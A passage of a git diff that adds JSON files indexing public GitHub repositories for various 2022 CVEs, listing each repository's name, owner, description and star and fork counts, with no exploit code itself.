"stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32223.json b/2022/CVE-2022-32223.json new file mode 100644 index 0000000000..6b244ec38e --- /dev/null +++ b/2022/CVE-2022-32223.json @@ -0,0 +1,33 @@ +[ + { + "id": 550267908, + "name": "cve-2022-32223", + "full_name": "ianyong\/cve-2022-32223", + "owner": { + "login": "ianyong", + "id": 5585517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5585517?v=4", + "html_url": "https:\/\/github.com\/ianyong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianyong\/cve-2022-32223", + "description": null, + "fork": false, + "created_at": "2022-10-12T13:24:46Z", + "updated_at": "2023-05-23T11:57:25Z", + "pushed_at": "2022-10-12T16:57:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32224.json b/2022/CVE-2022-32224.json new file mode 100644 index 0000000000..0d6ee08d75 --- /dev/null +++ b/2022/CVE-2022-32224.json @@ -0,0 +1,33 @@ +[ + { + "id": 514743200, + "name": "cve-2022-32224-rails", + "full_name": "ooooooo-q\/cve-2022-32224-rails", + "owner": { + "login": "ooooooo-q", + "id": 395584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/395584?v=4", + "html_url": "https:\/\/github.com\/ooooooo-q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ooooooo-q\/cve-2022-32224-rails", + "description": null, + "fork": false, + "created_at": "2022-07-17T04:09:03Z", + "updated_at": "2023-06-14T04:51:40Z", + "pushed_at": "2022-08-06T06:44:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32250.json b/2022/CVE-2022-32250.json new file mode 100644 index 0000000000..fd2376d7fe --- /dev/null +++ b/2022/CVE-2022-32250.json @@ -0,0 +1,157 @@ +[ + { + "id": 528286745, + "name": "CVE-2022-32250-exploit", + "full_name": "theori-io\/CVE-2022-32250-exploit", + "owner": { + "login": "theori-io", + "id": 18063559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18063559?v=4", + "html_url": "https:\/\/github.com\/theori-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theori-io\/CVE-2022-32250-exploit", + "description": null, + "fork": false, + "created_at": "2022-08-24T06:00:47Z", + "updated_at": "2024-12-22T17:03:09Z", + "pushed_at": "2023-06-18T14:43:52Z", + "stargazers_count": 170, + "watchers_count": 170, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 170, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 594075430, + "name": "CVE-2022-32250-LPE", + "full_name": "ysanatomic\/CVE-2022-32250-LPE", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/CVE-2022-32250-LPE", + "description": "LPE PoC of a user-after-free vulnerability in the Linux netfilter subsystem.", + "fork": false, + "created_at": "2023-01-27T14:44:39Z", + "updated_at": "2024-07-18T04:25:27Z", + "pushed_at": "2023-02-04T16:27:22Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716574497, + "name": "2022-32250LPE", + "full_name": "Decstor5\/2022-32250LPE", + "owner": { + "login": "Decstor5", + "id": 95436708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95436708?v=4", + "html_url": "https:\/\/github.com\/Decstor5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Decstor5\/2022-32250LPE", + "description": "CVE-2022-32250-LPE", + "fork": false, + "created_at": "2023-11-09T12:27:26Z", + "updated_at": "2023-11-09T12:27:26Z", + "pushed_at": "2023-11-09T13:47:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812759874, + "name": "CVE-2022-32250", + "full_name": "Kristal-g\/CVE-2022-32250", + "owner": { + "login": "Kristal-g", + "id": 61376744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61376744?v=4", + "html_url": "https:\/\/github.com\/Kristal-g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kristal-g\/CVE-2022-32250", + "description": "My exploit for CVE-2022-32250 for linux kernel 5.18", + "fork": false, + "created_at": "2024-06-09T19:53:54Z", + "updated_at": "2024-06-09T20:03:01Z", + "pushed_at": "2024-06-09T20:02:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 899547899, + "name": "CVE-2022-32250", + "full_name": "seadragnol\/CVE-2022-32250", + "owner": { + "login": "seadragnol", + "id": 55611051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55611051?v=4", + "html_url": "https:\/\/github.com\/seadragnol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seadragnol\/CVE-2022-32250", + "description": null, + "fork": false, + "created_at": "2024-12-06T13:49:38Z", + "updated_at": "2024-12-07T11:26:47Z", + "pushed_at": "2024-12-07T11:26:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32548.json b/2022/CVE-2022-32548.json new file mode 100644 index 0000000000..6f0174c72b --- /dev/null +++ b/2022/CVE-2022-32548.json @@ -0,0 +1,33 @@ +[ + { + "id": 710702628, + "name": "CVE-2022-32548-RCE-POC", + "full_name": "MosaedH\/CVE-2022-32548-RCE-POC", + "owner": { + "login": "MosaedH", + "id": 75680991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75680991?v=4", + "html_url": "https:\/\/github.com\/MosaedH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MosaedH\/CVE-2022-32548-RCE-POC", + "description": null, + "fork": false, + "created_at": "2023-10-27T08:58:11Z", + "updated_at": "2024-12-18T01:15:33Z", + "pushed_at": "2023-10-27T09:00:33Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32832.json b/2022/CVE-2022-32832.json new file mode 100644 index 0000000000..95ae5f5744 --- /dev/null +++ b/2022/CVE-2022-32832.json @@ -0,0 +1,64 @@ +[ + { + "id": 516376265, + "name": "CVE-2022-32832", + "full_name": "Muirey03\/CVE-2022-32832", + "owner": { + "login": "Muirey03", + "id": 31448720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31448720?v=4", + "html_url": "https:\/\/github.com\/Muirey03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muirey03\/CVE-2022-32832", + "description": "Proof-of-concept and write-up for the CVE-2022-32832 vulnerability patched in iOS 15.6", + "fork": false, + "created_at": "2022-07-21T13:09:50Z", + "updated_at": "2024-12-09T01:44:46Z", + "pushed_at": "2022-07-21T13:44:32Z", + "stargazers_count": 96, + "watchers_count": 96, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 96, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 516837211, + "name": "CVE-2022-32832", + "full_name": "AkbarTrilaksana\/CVE-2022-32832", + "owner": { + "login": "AkbarTrilaksana", + "id": 108668044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108668044?v=4", + "html_url": "https:\/\/github.com\/AkbarTrilaksana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkbarTrilaksana\/CVE-2022-32832", + "description": null, + "fork": false, + "created_at": "2022-07-22T17:37:27Z", + "updated_at": "2022-08-06T20:52:44Z", + "pushed_at": "2022-07-22T17:37:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32862.json b/2022/CVE-2022-32862.json new file mode 100644 index 0000000000..0e16bed264 --- /dev/null +++ b/2022/CVE-2022-32862.json @@ -0,0 +1,33 @@ +[ + { + "id": 691220861, + "name": "CVE-2022-32862", + "full_name": "rohitc33\/CVE-2022-32862", + "owner": { + "login": "rohitc33", + "id": 70339497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70339497?v=4", + "html_url": "https:\/\/github.com\/rohitc33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohitc33\/CVE-2022-32862", + "description": "macOS TCC bypass", + "fork": false, + "created_at": "2023-09-13T18:29:27Z", + "updated_at": "2024-07-24T08:39:11Z", + "pushed_at": "2023-09-13T18:33:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32883.json b/2022/CVE-2022-32883.json new file mode 100644 index 0000000000..cc05c5797f --- /dev/null +++ b/2022/CVE-2022-32883.json @@ -0,0 +1,35 @@ +[ + { + "id": 538159673, + "name": "CVE-2022-32883", + "full_name": "breakpointHQ\/CVE-2022-32883", + "owner": { + "login": "breakpointHQ", + "id": 88584206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88584206?v=4", + "html_url": "https:\/\/github.com\/breakpointHQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/breakpointHQ\/CVE-2022-32883", + "description": "Turning Your Computer Into a GPS Tracker With Apple Maps", + "fork": false, + "created_at": "2022-09-18T15:51:52Z", + "updated_at": "2024-01-10T06:15:29Z", + "pushed_at": "2024-02-06T11:51:08Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "macos" + ], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32898.json b/2022/CVE-2022-32898.json new file mode 100644 index 0000000000..afafa95b9a --- /dev/null +++ b/2022/CVE-2022-32898.json @@ -0,0 +1,33 @@ +[ + { + "id": 776714071, + "name": "CVE-2022-32898", + "full_name": "ox1111\/CVE-2022-32898", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/CVE-2022-32898", + "description": null, + "fork": false, + "created_at": "2024-03-24T09:26:29Z", + "updated_at": "2024-03-24T09:26:29Z", + "pushed_at": "2024-03-24T10:41:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32932.json b/2022/CVE-2022-32932.json new file mode 100644 index 0000000000..5c8de348ca --- /dev/null +++ b/2022/CVE-2022-32932.json @@ -0,0 +1,33 @@ +[ + { + "id": 777471417, + "name": "CVE-2022-32932", + "full_name": "ox1111\/CVE-2022-32932", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/CVE-2022-32932", + "description": null, + "fork": false, + "created_at": "2024-03-25T23:00:41Z", + "updated_at": "2024-07-31T09:46:19Z", + "pushed_at": "2024-03-25T23:26:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32947.json b/2022/CVE-2022-32947.json new file mode 100644 index 0000000000..5c3067bac5 --- /dev/null +++ b/2022/CVE-2022-32947.json @@ -0,0 +1,33 @@ +[ + { + "id": 692673503, + "name": "agx-exploit", + "full_name": "asahilina\/agx-exploit", + "owner": { + "login": "asahilina", + "id": 102031928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102031928?v=4", + "html_url": "https:\/\/github.com\/asahilina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asahilina\/agx-exploit", + "description": "CVE-2022-32947 walkthough and demo", + "fork": false, + "created_at": "2023-09-17T08:21:47Z", + "updated_at": "2025-01-02T03:48:32Z", + "pushed_at": "2023-09-18T03:04:48Z", + "stargazers_count": 158, + "watchers_count": 158, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 158, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32981.json b/2022/CVE-2022-32981.json new file mode 100644 index 0000000000..ee130ffa7a --- /dev/null +++ b/2022/CVE-2022-32981.json @@ -0,0 +1,33 @@ +[ + { + "id": 905956447, + "name": "CVE-2022-32981", + "full_name": "SpiralBL0CK\/CVE-2022-32981", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-32981", + "description": "poc for CVE-2022-32981 under work", + "fork": false, + "created_at": "2024-12-19T21:15:39Z", + "updated_at": "2024-12-20T20:37:02Z", + "pushed_at": "2024-12-20T20:36:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33075.json b/2022/CVE-2022-33075.json new file mode 100644 index 0000000000..38745aeba4 --- /dev/null +++ b/2022/CVE-2022-33075.json @@ -0,0 +1,33 @@ +[ + { + "id": 514549858, + "name": "CVE-2022-33075", + "full_name": "angelopioamirante\/CVE-2022-33075", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2022-33075", + "description": "Zoo Management System 1.0 - Stored Cross-Site-Scripting (XSS)", + "fork": false, + "created_at": "2022-07-16T10:44:52Z", + "updated_at": "2022-07-16T10:44:52Z", + "pushed_at": "2022-07-16T10:54:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33082.json b/2022/CVE-2022-33082.json new file mode 100644 index 0000000000..8c518436d6 --- /dev/null +++ b/2022/CVE-2022-33082.json @@ -0,0 +1,33 @@ +[ + { + "id": 657277228, + "name": "cve-2022-33082-exploit", + "full_name": "cyberqueenmeg\/cve-2022-33082-exploit", + "owner": { + "login": "cyberqueenmeg", + "id": 62813469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62813469?v=4", + "html_url": "https:\/\/github.com\/cyberqueenmeg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberqueenmeg\/cve-2022-33082-exploit", + "description": null, + "fork": false, + "created_at": "2023-06-22T17:50:18Z", + "updated_at": "2023-06-22T18:49:31Z", + "pushed_at": "2023-06-22T22:53:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3317.json b/2022/CVE-2022-3317.json new file mode 100644 index 0000000000..2f5cc67581 --- /dev/null +++ b/2022/CVE-2022-3317.json @@ -0,0 +1,33 @@ +[ + { + "id": 588477448, + "name": "CVE-2022-3317", + "full_name": "hfh86\/CVE-2022-3317", + "owner": { + "login": "hfh86", + "id": 42328886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42328886?v=4", + "html_url": "https:\/\/github.com\/hfh86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hfh86\/CVE-2022-3317", + "description": "Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)", + "fork": false, + "created_at": "2023-01-13T08:06:54Z", + "updated_at": "2023-01-13T08:06:54Z", + "pushed_at": "2023-01-13T08:06:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33174.json b/2022/CVE-2022-33174.json new file mode 100644 index 0000000000..ed194e77e4 --- /dev/null +++ b/2022/CVE-2022-33174.json @@ -0,0 +1,33 @@ +[ + { + "id": 531754524, + "name": "CVE-2022-33174", + "full_name": "Henry4E36\/CVE-2022-33174", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2022-33174", + "description": "Powertek PDU身份绕过", + "fork": false, + "created_at": "2022-09-02T02:27:31Z", + "updated_at": "2024-07-17T14:32:15Z", + "pushed_at": "2022-09-02T02:32:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3328.json b/2022/CVE-2022-3328.json new file mode 100644 index 0000000000..e549e9c768 --- /dev/null +++ b/2022/CVE-2022-3328.json @@ -0,0 +1,33 @@ +[ + { + "id": 572958937, + "name": "CVE-2022-3328", + "full_name": "Mr-xn\/CVE-2022-3328", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-3328", + "description": "CVE-2022-3328 with CVE-2022-41974 and CVE-2022-41973", + "fork": false, + "created_at": "2022-12-01T11:57:25Z", + "updated_at": "2022-12-16T09:03:55Z", + "pushed_at": "2022-12-01T11:58:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3357.json b/2022/CVE-2022-3357.json new file mode 100644 index 0000000000..d1f935b93f --- /dev/null +++ b/2022/CVE-2022-3357.json @@ -0,0 +1,33 @@ +[ + { + "id": 824252334, + "name": "CVE-2021-3493_CVE-2022-3357", + "full_name": "iamz24\/CVE-2021-3493_CVE-2022-3357", + "owner": { + "login": "iamz24", + "id": 97619614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97619614?v=4", + "html_url": "https:\/\/github.com\/iamz24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iamz24\/CVE-2021-3493_CVE-2022-3357", + "description": null, + "fork": false, + "created_at": "2024-07-04T17:29:28Z", + "updated_at": "2024-07-04T20:20:33Z", + "pushed_at": "2024-07-04T20:20:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33679.json b/2022/CVE-2022-33679.json new file mode 100644 index 0000000000..e9184c0157 --- /dev/null +++ b/2022/CVE-2022-33679.json @@ -0,0 +1,126 @@ +[ + { + "id": 561008998, + "name": "CVE-2022-33679", + "full_name": "Bdenneu\/CVE-2022-33679", + "owner": { + "login": "Bdenneu", + "id": 43793247, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43793247?v=4", + "html_url": "https:\/\/github.com\/Bdenneu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bdenneu\/CVE-2022-33679", + "description": "One day based on https:\/\/googleprojectzero.blogspot.com\/2022\/10\/rc4-is-still-considered-harmful.html", + "fork": false, + "created_at": "2022-11-02T18:38:01Z", + "updated_at": "2024-12-13T21:06:58Z", + "pushed_at": "2024-11-10T17:21:28Z", + "stargazers_count": 396, + "watchers_count": 396, + "has_discussions": false, + "forks_count": 69, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 69, + "watchers": 396, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 561256864, + "name": "CVE-2022-33679", + "full_name": "Blyth0He\/CVE-2022-33679", + "owner": { + "login": "Blyth0He", + "id": 12743647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12743647?v=4", + "html_url": "https:\/\/github.com\/Blyth0He", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Blyth0He\/CVE-2022-33679", + "description": "poc of CVE-2022-33679", + "fork": false, + "created_at": "2022-11-03T09:52:31Z", + "updated_at": "2023-09-20T08:03:32Z", + "pushed_at": "2022-11-03T10:02:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561287755, + "name": "CVE-2022-33679", + "full_name": "Amulab\/CVE-2022-33679", + "owner": { + "login": "Amulab", + "id": 86412102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86412102?v=4", + "html_url": "https:\/\/github.com\/Amulab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amulab\/CVE-2022-33679", + "description": "poc of CVE-2022-33679", + "fork": false, + "created_at": "2022-11-03T11:19:29Z", + "updated_at": "2023-05-08T16:41:17Z", + "pushed_at": "2022-11-03T11:24:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566754684, + "name": "Kerberos_CVE-2022-33679", + "full_name": "notareaperbutDR34P3r\/Kerberos_CVE-2022-33679", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/Kerberos_CVE-2022-33679", + "description": null, + "fork": false, + "created_at": "2022-11-16T10:56:02Z", + "updated_at": "2022-11-24T01:09:07Z", + "pushed_at": "2023-02-10T21:24:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3368.json b/2022/CVE-2022-3368.json new file mode 100644 index 0000000000..15f77e19a3 --- /dev/null +++ b/2022/CVE-2022-3368.json @@ -0,0 +1,64 @@ +[ + { + "id": 553474071, + "name": "CVE-2022-3368", + "full_name": "Wh04m1001\/CVE-2022-3368", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2022-3368", + "description": null, + "fork": false, + "created_at": "2022-10-18T09:16:04Z", + "updated_at": "2024-08-12T20:27:52Z", + "pushed_at": "2022-10-18T09:30:55Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 767696686, + "name": "CrackAVFee", + "full_name": "byt3n33dl3\/CrackAVFee", + "owner": { + "login": "byt3n33dl3", + "id": 151133481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151133481?v=4", + "html_url": "https:\/\/github.com\/byt3n33dl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3n33dl3\/CrackAVFee", + "description": "it's a CVE-2022-3368 (Patched), but feel free to use it for check any outdated software or reseach", + "fork": false, + "created_at": "2024-03-05T18:31:29Z", + "updated_at": "2024-11-17T16:50:59Z", + "pushed_at": "2024-07-08T16:18:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33891.json b/2022/CVE-2022-33891.json new file mode 100644 index 0000000000..4c3ce39781 --- /dev/null +++ b/2022/CVE-2022-33891.json @@ -0,0 +1,374 @@ +[ + { + "id": 515257144, + "name": "cve-2022-33891", + "full_name": "W01fh4cker\/cve-2022-33891", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/cve-2022-33891", + "description": "cve-2022-33891-poc", + "fork": false, + "created_at": "2022-07-18T16:16:51Z", + "updated_at": "2024-08-12T20:25:12Z", + "pushed_at": "2022-07-20T08:00:18Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-33891" + ], + "visibility": "public", + "forks": 22, + "watchers": 52, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 515706046, + "name": "cve-2022-33891", + "full_name": "HuskyHacks\/cve-2022-33891", + "owner": { + "login": "HuskyHacks", + "id": 57866415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4", + "html_url": "https:\/\/github.com\/HuskyHacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuskyHacks\/cve-2022-33891", + "description": "Apache Spark Shell Command Injection Vulnerability", + "fork": false, + "created_at": "2022-07-19T18:52:12Z", + "updated_at": 